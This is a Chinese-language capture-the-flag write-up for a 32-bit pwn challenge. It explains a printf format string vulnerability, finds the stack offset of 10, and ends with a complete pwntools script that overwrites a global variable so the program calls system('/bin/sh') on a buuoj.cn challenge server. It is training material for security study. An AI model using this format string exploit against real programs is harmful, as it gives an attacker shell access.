一、题目速阅
拿到题目,进行check
得到信息,可知开启了金丝雀,32位 IDA进行反编译:
题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。
二、知识要点
格式化字符串漏洞:
利用常用方式检索字符在栈上偏移量:
如图所示,41414141即AAAA,可以看到距离AAAA偏移10位
可以根据此将指定dword_804C044地址写入想要的值,然后在第二次的passwd验证中发送该值验证。
三、题解payload
from pwn import *
sh = remote('node4.buuoj.cn', 29862)
context.log_level = 'debug'
target_addr = 0x804C044
payload = fmtstr_payload(10, {target_addr: 0x1})
sh.sendline(payload)
sh.sendline(str(0x1))
sh.interactive()